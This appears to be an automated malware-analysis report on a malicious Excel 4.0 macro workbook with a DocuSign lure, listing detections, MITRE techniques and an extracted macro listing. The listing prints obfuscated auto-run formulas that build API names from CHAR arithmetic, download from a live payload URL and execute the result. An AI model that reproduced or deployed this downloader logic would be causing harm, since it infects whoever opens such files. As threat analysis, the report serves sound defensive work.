MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros with an Auto_Open entry, which is a critical finding. These macros use dangerous functions such as RUN and CALL and are designed to execute code retrieved from the embedded URL 'https://jpsteel.in/ds/261120.gif'. The macro code constructs and executes commands at runtime, indicating downloader functionality. The presence of ShellExecute API calls further supports the execution of external code.
Heuristics (7)
- ClamAV: Doc.Downloader.Docusign0521-9864805-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Docusign0521-9864805-0
- Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME: oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN: Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- URL reconstructed from XLM cell array (1 URL) [critical] OLE_XLM_CELL_ARRAY_URL: Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
- Reference to ShellExecute API [high] SC_STR_SHELLEXEC
- Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN: Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://jpsteel.in/ds/261120.gif (referenced by macro)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt (SHA-256 0d33d3f7accc92fdd60dbf912082de478929da664f047bbfbed4791982921d46) | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6676 bytes |
Preview script (first 1,000 lines of the extracted script):

```
' 0085 16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - DocuSig
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - File
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Files
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Files
' 0085 15 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - rtutrd
' 0085 12 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ete
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d File!A40
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' File,A51,RUN(R59),""
' File,R59,RUN( File!M98),""
' File,M89,CONCATENATE("Ke"& DocuSig!BY80&"l32"),""
' File,M90,CONCATENATE("Cr"& DocuSig!BY92&"yA"),""
' File,M91,"JCJ",""
' File,M92, DocuSig!BN62,""
' File,M94, DocuSig!BN62& DocuSig!BN77,""
' File,M98,"CALL(""&""&""&""&""&""&""&""&""&M89,M90,M91,M92,0)",""
' File,M99,RUN(M105),""
' File,M105,"CALL(M89,M90,M91,M94,0)",""
' File,M106,RUN( rtutrd!A70),""
' Files,A59,EXEC( Files!W36& DocuSig!BN62& DocuSig!BN77& DocuSig!BN91),""
' Files,A60,HALT(),""
' Files,A70,RUN( Files!D67),""
' Files,D67,"CALL("UR"& DocuSig!BY111&"n","UR"& DocuSig!BY120&"e"&"A","IICCII",0, DocuSig!FE100, DocuSig!BN62& DocuSig!BN77& DocuSig!BN91,0,0)",""
' Files,D68,RUN( rtutrd!A59),""
' rtutrd,BN62,"CONCATENATE(BN63,BN64,BN65,BN66,BN67,BN68,BN69,BN70,BN71)",""
' rtutrd,BN63,CHAR(BO63+BP63+BQ63),""
' rtutrd,BN64,CHAR(BO64+BP64+BQ64),""
' rtutrd,BN65,CHAR(BO65+BP65+BQ65),""
' rtutrd,BN66,CHAR(BO66+BP66-BQ66),""
' rtutrd,BN67,CHAR(BO67+BP67-BQ67),""
' rtutrd,BN68,CHAR(BO68+BP68-BQ68),""
' rtutrd,BN69,CHAR(BO69-BP69+BQ69),""
' rtutrd,BN70,CHAR(BO70-BP70+BQ70),""
' rtutrd,BN71,CHAR(BO71-BP71+BQ71),""
' rtutrd,BN77,"CONCATENATE(BN78,BN79,BN80,BN81,BN82,BN83,BN84)",""
' rtutrd,BN78,CHAR(BO78-BP78-BQ78),""
' rtutrd,BN79,CHAR(BO79-BP79-BQ79),""
' rtutrd,BN80,CHAR(BO80-BP80-BQ80),""
' rtutrd,BY80,CONCATENATE(BY83&BY84&BY85),""
' rtutrd,BN81,CHAR(BO81-BP81+BQ81),""
' rtutrd,BY81,CHAR(BZ81+CA81+CB81),""
' rtutrd,BN82,CHAR(BO82-BP82+BQ82),""
' rtutrd,BY82,CHAR(BZ82+CA82+CB82),""
' rtutrd,BN83,CHAR(BO83-BP83+BQ83),""
' rtutrd,BY83,CHAR(BZ83+CA83+CB83),""
' rtutrd,BN84,CHAR(BO84-BP84+BQ84),""
' rtutrd,BY84,CHAR(BZ84+CA84+CB84),""
' rtutrd,BY85,CHAR(BZ85-CA85-CB85),""
' rtutrd,BY86,CHAR(BZ86-CA86-CB86),""
' rtutrd,BY87,CHAR(BZ87-CA87+CB87),""
' rtutrd,BY88,CHAR(BZ88-CA88+CB88),""
' rtutrd,BN91,"CONCATENATE(BN92,BN93,BN94,BN95,BN96,BN97,BN98,BN99,BN100,BN101,BN102,BN103,BN104)",""
' rtutrd,BN92,[],""
' rtutrd,BY92,"CONCATENATE(BY95,BY96, Files!BC60, Files!BC61&"D"& DocuSig!BY97, DocuSig!BY98, DocuSig!BY99, DocuSig!BY100, DocuSig!BY101, DocuSig!BY102, DocuSig!BY103)",""
' rtutrd,BN93,[],""
' rtutrd,BY93,CHAR(BZ93+CA93+CB93),""
' rtutrd,BN94,[],""
' rtutrd,BS94,CONCATENATE(BS95&BS96&BS97&BS98),""
' rtutrd,BY94,CHAR(BZ94+CA94+CB94),""
' rtutrd,BN95,[],""
' rtutrd,BS95,CHAR(BT95+BU95-BV95),""
' rtutrd,BY95,CHAR(101),""
' rtutrd,BN96,[],""
' rtutrd,BS96,CHAR(BT96+BU96-BV96),""
' rtutrd,BY96,CHAR(BZ96+CA96+CB96),""
' rtutrd,BN97,[],""
' rtutrd,BS97,CHAR(BT97-BU97+BV97),""
' rtutrd,BY97,CHAR(BZ97-CA97-CB97),""
' rtutrd,BN98,[],""
' rtutrd,BS98,CHAR(BT98-BU98+BV98),""
' rtutrd,BY98,CHAR(BZ98+CA98-CB98),""
' rtutrd,BN99,[],""
' rtutrd,BY99,CHAR(BZ99+CA99-CB99),""
' rtutrd,BN100,[],""
' rtutrd,BY100,CHAR(99),""
' rtutrd,FE100,"https://jpsteel.in/ds/261120.gif",""
' rtutrd,BN101,[],""
' rtutrd,BY101,CHAR(BZ101+CA101-CB101),""
' rtutrd,BN102,[],""
' rtutrd,BY102,CHAR(BZ102-CA102+CB102),""
' rtutrd,BN103,[],""
' rtutrd,BY103,CHAR(BZ103-CA103+CB103),""
' rtutrd,BN104,[],""
' rtutrd,BY111,"CONCATENATE(BY114,BY115,BY116)",""
' rtutrd,BY112,CHAR(BZ112+CA112+CB112),""
' rtutrd,BY113,CHAR(BZ113+CA113+CB113),""
' rtutrd,BY114,CHAR(BZ114+CA114+CB114),""
' rtutrd,BY115,CHAR(BZ115-CA115-CB115),""
' rtutrd,BY116,CHAR(BZ116-CA116-CB116),""
' rtutrd,BY117,CHAR(BZ117-CA117-CB117),""
' rtutrd,BY120,"CONCATENATE(BY123,BY124,BY125,BY126,BY127,BY128,BY129,BY130,BY131,BY132,BY133,BY134,BY135,BY136)",""
' rtutrd,BY121,"CHAR(SUM(BZ121,CA121,CB121))",""
' rtutrd,BY122,"CHAR(SUM(BZ122,CA122,CB122))",""
' rtutrd,BY123,"CHAR(SUM(BZ123,CA123,CB123))",""
' rtutrd,BY124,CHAR(BZ124-CA124-CB124),""
' rtutrd,BY125,CHAR(BZ125-CA125-CB125),""
' rtutrd,BR126,CONCATENATE(BR127&BR128&BR129&BR130&BR131&BR132&BR133),""
' rtutrd,BY126,CHAR(BZ126-CA126-CB126),""
' rtutrd,BR127,CHAR(BS127+BT127+BU127),""
' rtutrd,BY127,CHAR(BZ127+CA127-CB127),""
' rtutrd,BR128,CHAR(BS128+BT128+BU128),""
' rtutrd,BY128,CHAR(BZ128+CA128-CB128),""
' rtutrd,BR129,CHAR(BS129+BT129+BU129),""
' rtutrd,BY129,CHAR(BZ129+CA129-CB129),""
' rtutrd,BR130,CHAR(BS130+BT130+BU130),""
' rtutrd,BY130,CHAR(BZ130-CA130+CB130),""
' rtutrd,BR131,CHAR(BS131-BT131-BU131),""
' rtutrd,BY131,CHAR(BZ131-CA131+CB131),""
' rtutrd,BR132,CHAR(BS132-BT132-BU132),""
' rtutrd,BY132,CHAR(BZ132-CA132+CB132),""
' rtutrd,BR133,CHAR(BS133-BT133-BU133),""
' rtutrd,BY133,"CHAR(SUM(BZ133,CA133,CB133))",""
' rtutrd,BY134,"CHAR(SUM(BZ134,CA134,CB134))",""
' rtutrd,BY135,"CHAR(SUM(BZ135,CA135,CB135))",""
' rtutrd,BY136,CHAR(BZ136-CA136-CB136),""
' rtutrd,BY137,CHAR(BZ137-CA137-CB137),""
' rtutrd,BY138,CHAR(BZ138-CA138-CB138),""
' ete,W36,"CONCATENATE(W37,W38,W39,W40,W41,W42,W43,W44,W45,W46,W47,W48)",""
' ete,W37,[],""
' ete,W38,[],""
' ete,W39,[],""
' ete,W40,[],""
' ete,W41,[],""
' ete,W42,[],""
' ete,W43,[],""
' ete,W44,[],""
' ete,W45,[],""
' ete,W46,[],""
' ete,W47,[],""
' ete,W48,[],""
' ete,BC60,CHAR(BD60-BE60-BF60),""
' ete,BC61,CHAR(BD61-BE61-BF61),""
' ete,N62,"CONCATENATE("S"&N64,N65,N66,N67,N68&S76)",""
' ete,BC62,CHAR(BD62-BE62-BF62),""
' ete,N63,CHAR(O63+P63+Q63),""
' ete,N64,CHAR(O64+P64+Q64),""
' ete,N65,CHAR(O65+P65+Q65),""
' ete,N66,CHAR(O66-P66-Q66),""
' ete,N67,CHAR(O67-P67-Q67),""
' ete,N68,CHAR(O68-P68-Q68),""
' ete,S76,"CONCATENATE(S77,S78,S79,S80,S81,S82&"A")",""
' ete,S77,CHAR(T77-U77-V77),""
' ete,S78,CHAR(T78-U78+V78),""
' ete,S79,CHAR(T79-U79+V79),""
' ete,S80,CHAR(T80-U80+V80),""
' ete,S81,CHAR(T81+U81-V81),""
' ete,S82,CHAR(T82+U82-V82),""
' ete,S83,CHAR(T83+U83-V83),""
```